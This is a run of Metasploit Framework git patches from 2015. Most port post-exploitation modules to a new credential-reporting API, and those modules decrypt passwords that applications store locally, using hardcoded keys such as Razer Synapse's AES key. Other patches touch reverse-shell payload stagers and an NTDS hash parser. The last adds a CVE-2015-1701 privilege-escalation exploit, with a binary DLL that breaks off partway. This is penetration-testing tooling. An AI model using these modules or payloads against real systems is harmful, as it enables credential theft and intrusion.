 1 file changed, 46 insertions(+), 5 deletions(-)

diff --git a/modules/post/multi/gather/dbvis_enum.rb b/modules/post/multi/gather/dbvis_enum.rb
index 42bc91d61d..f888c14c23 100644
--- a/modules/post/multi/gather/dbvis_enum.rb
+++ b/modules/post/multi/gather/dbvis_enum.rb
@@ -149,7 +149,7 @@ class Metasploit3 < Msf::Post
           db[:Namespace] = "";
         end
         # save
-        dbs << db if (db[:Alias] and db[:Type] and  db[:Server] and db[:Port] )
+        dbs << db if (db[:Alias] and db[:Type] and db[:Server] and db[:Port])
         db = {}
       end
 
@@ -161,7 +161,7 @@ class Metasploit3 < Msf::Post
 
         # get the type
         if line =~ /<Type>([\S+\s+]+)<\/Type>/i
-          db[:Type] = $1
+          db[:Type] = $1 
         end
 
         # get the user
@@ -205,6 +205,13 @@ class Metasploit3 < Msf::Post
       end
 
       db_table << [ db[:Alias], db[:Type], db[:Server], db[:Port], db[:Database], db[:Namespace], db[:UserID], db[:Password] ]
+      report_cred(
+        ip: db[:Server],
+        port: db[:Port].to_i,
+        service_name: db[:Type],
+        username: db[:UserID],
+        password: db[:Password]
+      )
     end
     return db_table
   end
@@ -278,12 +285,20 @@ class Metasploit3 < Msf::Post
     # Fill the tab
     dbs.each do |db|
       if (db[:URL] =~ /[\S+\s+]+[\/]+([\S+\s+]+):[\S+]+/i)
-        if ::Rex::Socket.is_ipv4?($1.to_s)
-          print_good("Reporting #{$1}")
-          report_host(:host => $1.to_s)
+        server = $1
+        if ::Rex::Socket.is_ipv4?(server)
+          print_good("Reporting #{server}")
+          report_host(:host => server)
         end
       end
       db_table << [ db[:Alias] , db[:Type] , db[:URL], db[:UserID], db[:Password] ]
+      report_cred(
+        ip: server,
+        port: '',
+        service_name: db[:Type],
+        username: db[:UserID],
+        password: db[:Password]
+      )
     end
     return db_table
   end
@@ -297,6 +312,32 @@ class Metasploit3 < Msf::Post
     found
   end
 
+  def report_cred(opts)
+    service_data = {
+      address: opts[:ip],
+      port: opts[:port],
+      service_name: opts[:service_name],
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      post_reference_name: self.refname,
+      session_id: session_db_id,
+      origin_type: :session,
+      private_data: opts[:password],
+      private_type: :password,
+      username: opts[:username]
+    }.merge(service_data)
+
+    login_data = {
+      core: create_credential(credential_data),
+      status: Metasploit::Model::Login::Status::UNTRIED,
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
+
   def decrypt_password(enc_password)
     enc_password = Rex::Text.decode_base64(enc_password)
     dk, iv = get_derived_key

From 7485cf776ef9264e41eb389e8932c871357a7c2c Mon Sep 17 00:00:00 2001
From: root <void-in@users.noreply.github.com>
Date: Tue, 2 Jun 2015 14:18:36 +0500
Subject: [PATCH 0275/1013] Remove unnecessary spaces

---
 modules/post/multi/gather/dbvis_enum.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/post/multi/gather/dbvis_enum.rb b/modules/post/multi/gather/dbvis_enum.rb
index f888c14c23..8c07940817 100644
--- a/modules/post/multi/gather/dbvis_enum.rb
+++ b/modules/post/multi/gather/dbvis_enum.rb
@@ -161,7 +161,7 @@ class Metasploit3 < Msf::Post
 
         # get the type
         if line =~ /<Type>([\S+\s+]+)<\/Type>/i
-          db[:Type] = $1 
+          db[:Type] = $1
         end
 
         # get the user

From ac2a52b5224ce3e2912822b8f1c4d4d0123b71d5 Mon Sep 17 00:00:00 2001
From: Tim <timrlw@gmail.com>
Date: Tue, 2 Jun 2015 10:54:49 +0100
Subject: [PATCH 0276/1013] fix android/java reverse_tcp

---
 modules/payloads/stagers/android/reverse_tcp.rb | 4 ++++
 modules/payloads/stagers/java/reverse_tcp.rb    | 4 ++++
 2 files changed, 8 insertions(+)

diff --git a/modules/payloads/stagers/android/reverse_tcp.rb b/modules/payloads/stagers/android/reverse_tcp.rb
index 603d1acf42..6aacb42a45 100644
--- a/modules/payloads/stagers/android/reverse_tcp.rb
+++ b/modules/payloads/stagers/android/reverse_tcp.rb
@@ -28,6 +28,10 @@ module Metasploit3
     ))
   end
 
+  def include_send_uuid
+      false
+  end
+
   def generate_jar(opts={})
     jar = Rex::Zip::Jar.new
 
diff --git a/modules/payloads/stagers/java/reverse_tcp.rb b/modules/payloads/stagers/java/reverse_tcp.rb
index bfb6058553..514f8b35aa 100644
--- a/modules/payloads/stagers/java/reverse_tcp.rb
+++ b/modules/payloads/stagers/java/reverse_tcp.rb
@@ -41,6 +41,10 @@ module Metasploit3
     @class_files = [ ]
   end
 
+  def include_send_uuid
+      false
+  end
+
   def config
     spawn = datastore["Spawn"] || 2
     c =  ""

From aac2db826f49ab2a0e4af3d0ae83c065e839131a Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Tue, 2 Jun 2015 10:24:55 -0500
Subject: [PATCH 0277/1013] Remove comment about report_auth_info

This module isn't using report_auth_info, so this comment is no
longer needed.
---
 modules/post/windows/gather/credentials/filezilla_server.rb | 2 --
 1 file changed, 2 deletions(-)

diff --git a/modules/post/windows/gather/credentials/filezilla_server.rb b/modules/post/windows/gather/credentials/filezilla_server.rb
index 7a5b737961..2d81a3929a 100644
--- a/modules/post/windows/gather/credentials/filezilla_server.rb
+++ b/modules/post/windows/gather/credentials/filezilla_server.rb
@@ -199,8 +199,6 @@ class Metasploit3 < Msf::Post
     end
     # report the goods!
     if config['admin_port'] == "<none>"
-      #if report_auth_info executes with admin_port equal to "<none>"
-      #the module will crash with an error.
       vprint_status("(No admin information found.)")
     else
       service_data = {

From 28556ea6e26b89e287cdac7bc0761d6bd6f231e1 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Tue, 2 Jun 2015 12:16:07 -0500
Subject: [PATCH 0278/1013] Update spark_im to use the new cred API

---
 .../windows/gather/credentials/spark_im.rb    | 52 ++++++++++++++-----
 1 file changed, 38 insertions(+), 14 deletions(-)

diff --git a/modules/post/windows/gather/credentials/spark_im.rb b/modules/post/windows/gather/credentials/spark_im.rb
index 7a8ee120c0..b766c6c34e 100644
--- a/modules/post/windows/gather/credentials/spark_im.rb
+++ b/modules/post/windows/gather/credentials/spark_im.rb
@@ -49,30 +49,54 @@ class Metasploit3 < Msf::Post
     password = ::Rex::Text.to_utf8(password)
 
     user, pass = password.scan(/[[:print:]]+/)
+    cred_opts = {}
     if pass.nil? or pass.empty?
       print_status("Username found: #{user}, but no password")
-      pass = ''
+      cred_opts.merge!(user: user)
     else
       print_good("Decrypted Username #{user} Password: #{pass}")
+      cred_opts.merge!(user: user, password: pass)
     end
 
-    store_creds(user, pass)
+    cred_opts.merge!(
+      ip: client.sock.peerhost,
+      port: 5222,
+      service_name: 'spark'
+    )
+
+    report_cred(cred_opts)
   end
 
-  def store_creds(user, pass)
-    if db
-      report_auth_info(
-        :host   => client.sock.peerhost,
-        :port   => 5222,
-        :ptype  => 'password',
-        :sname  => 'spark',
-        :user   => user,
-        :pass   => pass,
-        :duplicate_ok => true,
-        :active => true
+  def report_cred(opts)
+    service_data = {
+      address: opts[:ip],
+      port: opts[:port],
+      service_name: opts[:service_name],
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      module_fullname: fullname,
+      post_reference_name: self.refname,
+      session_id: session_db_id,
+      origin_type: :session,
+      username: opts[:user],
+      private_type: :password
+    }.merge(service_data)
+
+    if opts[:password]
+      credential_data.merge!(
+        private_data: opts[:password],
       )
-      print_status("Loot stored in the db")
     end
+
+    login_data = {
+      core: create_credential(credential_data),
+      status: Metasploit::Model::Login::Status::UNTRIED,
+    }.merge(service_data)
+
+    create_credential_login(login_data)
   end
 
   # main control method

From 63708f2bbac455af570aa1bf84acb438b52a4219 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Tue, 2 Jun 2015 12:27:35 -0500
Subject: [PATCH 0279/1013] Add module_fullname: fullname

---
 modules/post/windows/gather/credentials/total_commander.rb | 1 +
 1 file changed, 1 insertion(+)

diff --git a/modules/post/windows/gather/credentials/total_commander.rb b/modules/post/windows/gather/credentials/total_commander.rb
index 410c8efc28..2b807176cc 100644
--- a/modules/post/windows/gather/credentials/total_commander.rb
+++ b/modules/post/windows/gather/credentials/total_commander.rb
@@ -130,6 +130,7 @@ class Metasploit3 < Msf::Post
     }
 
     credential_data = {
+      module_fullname: fullname,
       post_reference_name: self.refname,
       session_id: session_db_id,
       origin_type: :session,

From dddbf3886bf47cf277075848be1ad1afaab75577 Mon Sep 17 00:00:00 2001
From: benpturner <benpturner@yahoo.com>
Date: Tue, 2 Jun 2015 18:33:06 +0100
Subject: [PATCH 0280/1013] Updated payload spec to be in the correct order and
 updated payload cached size

---
 .../windows/x64/powershell_bind_tcp.rb        |  2 +-
 .../windows/x64/powershell_reverse_tcp.rb     |  2 +-
 spec/modules/payloads_spec.rb                 | 20 +++++++++++++++++++
 3 files changed, 22 insertions(+), 2 deletions(-)

diff --git a/modules/payloads/singles/windows/x64/powershell_bind_tcp.rb b/modules/payloads/singles/windows/x64/powershell_bind_tcp.rb
index 7e17623a7a..065b8f5685 100644
--- a/modules/payloads/singles/windows/x64/powershell_bind_tcp.rb
+++ b/modules/payloads/singles/windows/x64/powershell_bind_tcp.rb
@@ -16,7 +16,7 @@ require 'msf/core/handler/bind_tcp'
 ###
 module Metasploit3
 
-  CachedSize = 1695
+  CachedSize = 1778
 
   include Msf::Payload::Windows::Exec_x64
   include Rex::Powershell::Command
diff --git a/modules/payloads/singles/windows/x64/powershell_reverse_tcp.rb b/modules/payloads/singles/windows/x64/powershell_reverse_tcp.rb
index f06cc8f038..4db849cd89 100644
--- a/modules/payloads/singles/windows/x64/powershell_reverse_tcp.rb
+++ b/modules/payloads/singles/windows/x64/powershell_reverse_tcp.rb
@@ -16,7 +16,7 @@ require 'msf/core/handler/reverse_tcp_ssl'
 ###
 module Metasploit3
 
-  CachedSize = 1703
+  CachedSize = 1786
 
   include Msf::Payload::Windows::Exec_x64
   include Msf::Payload::Windows::Powershell
diff --git a/spec/modules/payloads_spec.rb b/spec/modules/payloads_spec.rb
index aeaa2f3e78..a8ac6eefee 100644
--- a/spec/modules/payloads_spec.rb
+++ b/spec/modules/payloads_spec.rb
@@ -3629,6 +3629,26 @@ describe 'modules/payloads', :content do
                           reference_name: 'windows/x64/meterpreter_reverse_tcp'
   end
 
+  context 'windows/x64/powershell_bind_tcp' do
+    it_should_behave_like 'payload cached size is consistent',
+                          ancestor_reference_names: [
+                            'singles/windows/x64/powershell_bind_tcp'
+                          ],
+                          dynamic_size: false,
+                          modules_pathname: modules_pathname,
+                          reference_name: 'windows/x64/powershell_bind_tcp'
+  end
+
+  context 'windows/x64/powershell_reverse_tcp' do
+    it_should_behave_like 'payload cached size is consistent',
+                          ancestor_reference_names: [
+                            'singles/windows/x64/powershell_reverse_tcp'
+                          ],
+                          dynamic_size: false,
+                          modules_pathname: modules_pathname,
+                          reference_name: 'windows/x64/powershell_reverse_tcp'
+  end
+  
   context 'windows/x64/shell/bind_tcp' do
     it_should_behave_like 'payload cached size is consistent',
                           ancestor_reference_names: [

From e43163135bdec7514913666682c486437c2bd0c5 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Tue, 2 Jun 2015 12:33:34 -0500
Subject: [PATCH 0281/1013] Add module_fullname: fullname,

---
 modules/post/multi/gather/filezilla_client_cred.rb | 1 +
 1 file changed, 1 insertion(+)

diff --git a/modules/post/multi/gather/filezilla_client_cred.rb b/modules/post/multi/gather/filezilla_client_cred.rb
index 60ed1366af..736c4b9fc3 100644
--- a/modules/post/multi/gather/filezilla_client_cred.rb
+++ b/modules/post/multi/gather/filezilla_client_cred.rb
@@ -114,6 +114,7 @@ class Metasploit3 < Msf::Post
     }
 
     credential_data = {
+      module_fullname: fullname,
       post_reference_name: self.refname,
       session_id: session_db_id,
       origin_type: :session,

From c64f025c4eb8ec71cf2d5d04ff56379d400a362f Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Tue, 2 Jun 2015 12:35:06 -0500
Subject: [PATCH 0282/1013] Add module_fullname: fullname

---
 modules/post/windows/gather/credentials/tortoisesvn.rb | 1 +
 1 file changed, 1 insertion(+)

diff --git a/modules/post/windows/gather/credentials/tortoisesvn.rb b/modules/post/windows/gather/credentials/tortoisesvn.rb
index 0a3ac517e7..303f42695b 100644
--- a/modules/post/windows/gather/credentials/tortoisesvn.rb
+++ b/modules/post/windows/gather/credentials/tortoisesvn.rb
@@ -133,6 +133,7 @@ class Metasploit3 < Msf::Post
     }
 
     credential_data = {
+      module_fullname: fullname,
       post_reference_name: self.refname,
       session_id: session_db_id,
       origin_type: :session,

From 5d68a8167b041359ebd85f91153abbabcea44754 Mon Sep 17 00:00:00 2001
From: David Maloney <DMaloney@rapid7.com>
Date: Tue, 2 Jun 2015 12:46:21 -0500
Subject: [PATCH 0283/1013] handle unicode changes

changed everything to utf-8 , so several sizes
on the ruby side needed to be changed to account for this

MSP-12358
---
 lib/metasploit/framework/ntds/account.rb | 6 +++---
 lib/metasploit/framework/ntds/parser.rb  | 6 ++----
 2 files changed, 5 insertions(+), 7 deletions(-)

diff --git a/lib/metasploit/framework/ntds/account.rb b/lib/metasploit/framework/ntds/account.rb
index bd485790c8..f5f5a6e2d9 100644
--- a/lib/metasploit/framework/ntds/account.rb
+++ b/lib/metasploit/framework/ntds/account.rb
@@ -6,17 +6,17 @@ module Metasploit
       class Account
 
         # Size of an NTDS Account Struct on the Wire
-        ACCOUNT_SIZE = 3948
+        ACCOUNT_SIZE = 2908
         # Size of a Date or Time Format String on the Wire
         DATE_TIME_STRING_SIZE = 30
         # Size of the AccountDescription Field
-        DESCRIPTION_SIZE =2048
+        DESCRIPTION_SIZE =1024
         # Size of a Hash History Record
         HASH_HISTORY_SIZE = 792
         # Size of a Hash String
         HASH_SIZE = 33
         # Size of the samAccountName field
-        NAME_SIZE = 40
+        NAME_SIZE = 20
 
         #@return [String] The AD Account Description
         attr_accessor :description
diff --git a/lib/metasploit/framework/ntds/parser.rb b/lib/metasploit/framework/ntds/parser.rb
index 80fa1792cd..ac7a8c0274 100644
--- a/lib/metasploit/framework/ntds/parser.rb
+++ b/lib/metasploit/framework/ntds/parser.rb
@@ -6,10 +6,8 @@ module Metasploit
       # to provide a simple interface for enumerating AD user accounts.
       class Parser
 
-        # The size, in bytes, of an NTDS account object
-        ACCOUNT_SIZE = 3948
         # The size, in Bytes, of a batch of NTDS accounts
-        BATCH_SIZE = 78960
+        BATCH_SIZE = (Metasploit::Framework::NTDS::Account::ACCOUNT_SIZE * 20)
 
         #@return [Rex::Post::Meterpreter::Channels::Pool] The Meterpreter NTDS Parser Channel
         attr_accessor :channel
@@ -36,7 +34,7 @@ module Metasploit
            until raw_batch_data.nil?
              batch = raw_batch_data.dup
              while batch.present?
-               raw_data = batch.slice!(0,ACCOUNT_SIZE)
+               raw_data = batch.slice!(0,Metasploit::Framework::NTDS::Account::ACCOUNT_SIZE)
                # Make sure our data isn't all Null-bytes
                if raw_data.match(/[^\x00]/)
                  account = Metasploit::Framework::NTDS::Account.new(raw_data)

From 9713fe7f99e7daef4e53da1a2715853e84f6c84e Mon Sep 17 00:00:00 2001
From: Samuel Huckins <samuel_huckins@rapid7.com>
Date: Tue, 2 Jun 2015 13:26:10 -0500
Subject: [PATCH 0284/1013] Updating to MDM 1.2.1

* Fixes bug with Pro Vuln Validation validation pushes
---
 Gemfile.lock | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/Gemfile.lock b/Gemfile.lock
index 924a74de13..7248bf82e0 100644
--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -124,7 +124,7 @@ GEM
       activesupport (>= 4.0.9, < 4.1.0)
       railties (>= 4.0.9, < 4.1.0)
     metasploit-payloads (1.0.2)
-    metasploit_data_models (1.2.0)
+    metasploit_data_models (1.2.1)
       activerecord (>= 4.0.9, < 4.1.0)
       activesupport (>= 4.0.9, < 4.1.0)
       arel-helpers
@@ -174,7 +174,7 @@ GEM
       thor (>= 0.18.1, < 2.0)
     rake (10.4.2)
     rb-readline-r7 (0.5.2.0)
-    recog (2.0.2)
+    recog (2.0.4)
       nokogiri
     redcarpet (3.2.3)
     rkelly-remix (0.0.6)

From 0313f0b0cf77db02c2ca2eaf5c20cc9023929609 Mon Sep 17 00:00:00 2001
From: Spencer McIntyre <zeroSteiner@gmail.com>
Date: Tue, 2 Jun 2015 18:31:48 -0400
Subject: [PATCH 0285/1013] Check for a nil header value

---
 plugins/request.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/plugins/request.rb b/plugins/request.rb
index f503950a55..de5c720a49 100644
--- a/plugins/request.rb
+++ b/plugins/request.rb
@@ -137,7 +137,7 @@ class Plugin::Requests < Msf::Plugin
           return [nil, opt_parser]
         when '-H'
           name, value = val.split(':', 2)
-          options[:headers][name] = value.strip
+          options[:headers][name] = value.to_s.strip
         when '-i'
           options[:print_headers] = true
         when '-I'

From ef0d6490dabec77f1c55f3356753688d136eae18 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Wed, 3 Jun 2015 00:48:52 -0500
Subject: [PATCH 0286/1013] Update smartermail to use the new cred API

---
 .../windows/gather/credentials/smartermail.rb | 92 ++++++++++++++++---
 1 file changed, 81 insertions(+), 11 deletions(-)

diff --git a/modules/post/windows/gather/credentials/smartermail.rb b/modules/post/windows/gather/credentials/smartermail.rb
index 70f8451364..11f087fda3 100644
--- a/modules/post/windows/gather/credentials/smartermail.rb
+++ b/modules/post/windows/gather/credentials/smartermail.rb
@@ -66,15 +66,47 @@ class Metasploit3 < Msf::Post
     decipher.update(encrypted) + decipher.final
   end
 
+
+  def get_bound_port(data)
+    port = nil
+
+    begin
+      port = JSON.parse(data)['BoundPort']
+    rescue JSON::ParserError => e
+      elog("#{e.class} - Unable to parse BoundPort (#{e.message}) #{e.backtrace * "\n"}")
+      return nil
+    end
+
+    port
+  end
+
+
+  def get_remote_drive
+    @drive ||= expand_path('%SystemDrive%').strip
+  end
+
+
+  def get_web_server_port
+    ['Program Files (x86)', 'Program Files'].each do |program_dir|
+      path = %Q|#{get_remote_drive}\\#{program_dir}\\SmarterTools\\SmarterMail\\Web Server\\Settings.json|.strip
+      if file?(path)
+        data = read_file(path)
+        return get_bound_port(data)
+      end
+    end
+
+    return nil
+  end
+
+
   #
   # Find SmarterMail 'mailConfig.xml' config file
   #
   def get_mail_config_path
     found_path = ''
-    drive = expand_path('%SystemDrive%').strip
 
     ['Program Files (x86)', 'Program Files'].each do |program_dir|
-      path = %Q|#{drive}\\#{program_dir}\\SmarterTools\\SmarterMail\\Service\\mailConfig.xml|.strip
+      path = %Q|#{get_remote_drive}\\#{program_dir}\\SmarterTools\\SmarterMail\\Service\\mailConfig.xml|.strip
       vprint_status "#{peer} - Checking for SmarterMail config file: #{path}"
       if file?(path)
         found_path = path
@@ -106,12 +138,47 @@ class Metasploit3 < Msf::Post
     end
 
     username = data.match(/<sysAdminUserName>(.+)<\/sysAdminUserName>/)
-    password = data.match(/<sysAdminPassword>(.+)<\/sysAdminPassword>/)
+    password = data.scan(/<(sysAdminPassword|sysAdminPasswordHash)>(.+)<\/(sysAdminPassword|sysAdminPasswordHash)>/).flatten[1]
+
     result['username'] = username[1] unless username.nil?
-    result['password'] = decrypt_des(Rex::Text.decode_base64(password[1])) unless password.nil?
+
+    if password
+      begin
+        result['password'] = decrypt_des(Rex::Text.decode_base64(password))
+      rescue OpenSSL::Cipher::CipherError
+        result['password'] = password
+      end
+    end
+
     result
   end
 
+  def report_cred(opts)
+    service_data = {
+      address: opts[:ip],
+      port: opts[:port],
+      service_name: opts[:service_name],
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      post_reference_name: self.refname,
+      session_id: session_db_id,
+      origin_type: :session,
+      private_data: opts[:password],
+      private_type: :password,
+      username: opts[:user]
+    }.merge(service_data)
+
+    login_data = {
+      core: create_credential(credential_data),
+      status: Metasploit::Model::Login::Status::UNTRIED,
+    }.merge(service_data)
+
+    create_credential_login(login_data)
+  end
+
   #
   # Find the config file, extract the encrypted password and decrypt it
   #
@@ -131,15 +198,18 @@ class Metasploit3 < Msf::Post
     end
 
     # report result
+    port = get_web_server_port || 9998 # Default is 9998
     user = result['username']
     pass = result['password']
     print_good "#{peer} - Found Username: '#{user}' Password: '#{pass}'"
-    report_auth_info(
-      :host  => r_host,
-      :sname => 'http',
-      :user  => user,
-      :pass  => pass,
-      :source_id   => session.db_record ? session.db_record.id : nil,
-      :source_type => 'vuln')
+
+    report_cred(
+      ip: r_host,
+      port: port,
+      service_name: 'http',
+      user: user,
+      password: pass,
+
+    )
   end
 end

From b038760be73bb59a78097398e5f58bafb31bed76 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Wed, 3 Jun 2015 01:44:20 -0500
Subject: [PATCH 0287/1013] Update razer_synapse to use the new cred API

---
 .../gather/credentials/razer_synapse.rb       | 112 +++++++++++-------
 1 file changed, 67 insertions(+), 45 deletions(-)

diff --git a/modules/post/windows/gather/credentials/razer_synapse.rb b/modules/post/windows/gather/credentials/razer_synapse.rb
index 8fd16f920e..c73cd9de2b 100644
--- a/modules/post/windows/gather/credentials/razer_synapse.rb
+++ b/modules/post/windows/gather/credentials/razer_synapse.rb
@@ -38,59 +38,74 @@ class Metasploit3 < Msf::Post
     ))
   end
 
+  def is_base64?(str)
+    str.match(/^([A-Za-z0-9+\/]{4})*([A-Za-z0-9+\/]{4}|[A-Za-z0-9+\/]{3}=|[A-Za-z0-9+\/]{2}==)$/) ? true : false
+  end
+
   # decrypt password
-  def decrypt(hash)
+  def decrypt(pass)
+    pass = Rex::Text.decode_base64(pass) if is_base64?(pass)
     cipher = OpenSSL::Cipher::Cipher.new 'aes-256-cbc'
     cipher.decrypt
     cipher.key = "hcxilkqbbhczfeultgbskdmaunivmfuo"
     cipher.iv = "ryojvlzmdalyglrj"
 
-    hash.each_pair { |user,pass|
-      pass = pass.unpack("m")[0]
+    pass = pass.unpack("m")[0]
+    password = cipher.update pass
+    password << cipher.final
 
-      password = cipher.update pass
-      password << cipher.final rescue return nil
-
-      store_creds(user, password.split("||")[1])
-      print_good("Found credentials")
-      print_good("\tUser: #{user}")
-      print_good("\tPassword: #{password.split("||")[1]}")
-    }
+    password
   end
 
-  def store_creds(user, pass)
-    if db
-      report_auth_info(
-        :host   => Rex::Socket.resolv_to_dotted("www.razerzone.com"),
-        :port   => 443,
-        :ptype  => 'password',
-        :sname  => 'razer_synapse',
-        :user   => user,
-        :pass   => pass,
-        :duplicate_ok => true,
-        :active => true
-      )
-      vprint_status("Loot stored in the db")
-    end
+  def report_cred(opts)
+    service_data = {
+      address: opts[:ip],
+      port: opts[:port],
+      service_name: opts[:service_name],
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      post_reference_name: self.refname,
+      session_id: session_db_id,
+      origin_type: :session,
+      private_data: opts[:password],
+      private_type: :password,
+      username: opts[:user]
+    }.merge(service_data)
+
+    login_data = {
+      core: create_credential(credential_data),
+      status: Metasploit::Model::Login::Status::UNTRIED,
+    }.merge(service_data)
+
+    create_credential_login(login_data)
   end
 
   # Loop throuhg config, grab user and pass
-  def parse_config(config)
-    if not config =~ /<Version>\d<\/Version>/
-      creds = {}
-      cred_group = config.split("</SavedCredentials>")
-      cred_group.each { |cred|
-        user = /<Username>([^<]+)<\/Username>/.match(cred)
-        pass = /<Password>([^<]+)<\/Password>/.match(cred)
-        if user and pass
-          creds[user[1]] = pass[1]
-        end
-      }
-      return creds
-    else
-      print_error("Module only works against configs from version < 1.7.15")
-      return nil
+  def get_creds(config)
+    creds = {}
+
+    return nil if !config.include?('<Version>')
+
+    xml = ::Nokogiri::XML(config)
+    xml.xpath('//SavedCredentials').each do |node|
+      user = node.xpath('Username').text
+      pass = node.xpath('Password').text
+      begin
+        pass = decrypt(pass)
+      rescue OpenSSL::Cipher::CipherError
+        # Eh, ok. We tried.
+      end
+      creds[user] = pass
     end
+
+    creds
+  end
+
+  def razerzone_ip
+    @razerzone_ip ||= Rex::Socket.resolv_to_dotted("www.razerzone.com")
   end
 
   # main control method
@@ -104,11 +119,18 @@ class Metasploit3 < Msf::Post
         contents = read_file(accounts)
 
         # read the contents of file
-        creds = parse_config(contents)
-        if creds
-          decrypt(creds)
-        else
-          print_error("Could not read config or empty for #{user['UserName']}")
+        creds = get_creds(contents)
+        unless creds.empty?
+          creds.each_pair do |user, pass|
+            print_good("Found cred: #{user}:#{pass}")
+            report_cred(
+              ip: razerzone_ip,
+              port: 443,
+              service_name: 'http',
+              user: user,
+              password: pass
+            )
+          end
         end
       end
     end

From 455a3b6b9d5e97aaccdb561729b403c630a5ce76 Mon Sep 17 00:00:00 2001
From: OJ <oj@buffered.io>
Date: Wed, 3 Jun 2015 21:45:51 +1000
Subject: [PATCH 0288/1013] Add butchered version of CVE-2015-1701

---
 .../CVE-2015-1701/cve-2015-1701.x64.dll       |  Bin 0 -> 84992 bytes
 .../CVE-2015-1701/cve-2015-1701.x86.dll       |  Bin 0 -> 72192 bytes
 .../source/exploits/cve-2015-1701/.gitignore  |  151 +
 .../exploits/cve-2015-1701/cve-2015-1701.sln  |   28 +
 .../cve-2015-1701/cve-2015-1701.c             |  524 +++
 .../cve-2015-1701/cve-2015-1701.h             | 3887 +++++++++++++++++
 .../cve-2015-1701/cve-2015-1701.vcxproj       |  245 ++
 .../exploits/cve-2015-1701/make.msbuild       |   18 +
 external/source/exploits/make.bat             |    7 +
 .../local/ms15_051_client_copy_image.rb       |  135 +
 10 files changed, 4995 insertions(+)
 create mode 100755 data/exploits/CVE-2015-1701/cve-2015-1701.x64.dll
 create mode 100755 data/exploits/CVE-2015-1701/cve-2015-1701.x86.dll
 create mode 100755 external/source/exploits/cve-2015-1701/.gitignore
 create mode 100755 external/source/exploits/cve-2015-1701/cve-2015-1701.sln
 create mode 100755 external/source/exploits/cve-2015-1701/cve-2015-1701/cve-2015-1701.c
 create mode 100755 external/source/exploits/cve-2015-1701/cve-2015-1701/cve-2015-1701.h
 create mode 100755 external/source/exploits/cve-2015-1701/cve-2015-1701/cve-2015-1701.vcxproj
 create mode 100755 external/source/exploits/cve-2015-1701/make.msbuild
 create mode 100644 modules/exploits/windows/local/ms15_051_client_copy_image.rb

diff --git a/data/exploits/CVE-2015-1701/cve-2015-1701.x64.dll b/data/exploits/CVE-2015-1701/cve-2015-1701.x64.dll
new file mode 100755
index 0000000000000000000000000000000000000000..01af30b5a008ce3c02cbeef70e2f3bb5317b7b92
GIT binary patch
literal 84992
zcmeFadwi2c_CKC92@R#;370?-kN^eIDpo7n8qho?g(s3~@rsIwTkVHk5wT4K6}0tf
z-G(u{xa)0K*Tr@9qprKF>jes4k`~)S5eldjS)m}iP6%p6EiE9=_kCuPw5a?2e1D(6
zf4oRDbLMtt=FFKh=bV|8-muzaF_}zOd<?^6T8D4?=M{hd?|-_GJb2vt!KOC`elUKW
zIq<>ws~7#e%DuGm&i|^s<qmiGElZZ%8Fc^bHg{!ciTmeE+`cQWa^G?1t+!2eII?n+
zRhK_9s{4$tWzVNRw><m!^Oqui%d<~BKU;ji`219SPpv=r`~;Ej?&t5r_gQ~>;`zzq
z`!C7wm&Es#KQCWIb^RyI%Sue9TOYESp89mjHK{yZrU~vr8QCV&dO-dmq5O1wJ4LwK
zOkWhvFqv!uMBf5xGOfWk25-)=3?#b|k%dxUKaNXC=Q(E6^{8w5RI_P%vQF`Z))o)!
z2Uu-3<)j+z2mWEun`<^L?GJ1>nW};BfBH8yc-!(I60dH+A3~Y>PDIe}pW9?wIJNTD
zTY|TkOz&180d<-d;qxv&{r-7DE>mSTQ%?~RycmWN_@0dKe*e5CQ*`Q5nNjo+eKlnv
z!}K5J^G>b2ZSkGuCfRq4foTBp&H7Qk;(pct|H1#o2x!cj+q6ag)53vV`&HLmd!2f<
zdX0LmdYz^pE-d)M$MFAOTKJXRC((e9eaF71NWF-B&(|A<;fs`-HP*4N^ahiuqR0|D
zO)I}@x)!-Cs@3$q2lldTV9oT?Xz2xQ{=D6ZUALjxNefYd7M`E$)|i%~vAf(__>J7v
z1gz^;YO_JS8;BrPGyoX8w#=ujouz5)gV-iV^~JYTW+`uF=-jP6nXn+FSz7&;?G+`K
z#?Zc+-W%V(>=#PiKB|me>sHnt-ykX}FP_d`aZ1ducDa3QzAHCi*%7dOQc|!<jog({
z!ZK90DPU<-SDDa^@@~{`L@lj|)kZ^K*7W}B^1+9LIW@g6pKz=QI%|5b-u(ARg7%u;
zBj<My4qeTBt}!LbT1z03ogwpv2F_+@*90tw66eW61jq&8K*B9c6W{^>jwF<1HJP*7
zbO4T3SdIfLzussKSoT)b8A{y(40Ry<XE6^2U&Nn4_iB1?T6Ao>Quh~x18kOCeVf*Z
z=&irpJ6%=Qo=_vfT=OjUw2AsXn*}WH+3addZmFfU)Y7i9f$Sr{rFE4#wpn!7vc=NA
z%8cHARdZ}zR^Y0TdnWT)#-O61K*%4-HnFoG@mqL`1PZ?J>oH*XF)$3h7GM%PjlC@h
zL}PMF)doUKja+Y$(^*>gMR0g&-NB$zTGt)SDy=huHVqXF*Vu*q$)L`9(l9heL{eTg
z9doqKl#e;JeB+Dwy&wtI_!xgR)~c}{)!4<Zy;@^!>IP~|tJ@JA9$+njyrxxVwccv?
zTiX12J3~i6Mwbr&DWUyM!9p!^`PrZyHn+#e%sw{vgl5?lur!tCwUwd*CuY9X(o~<}
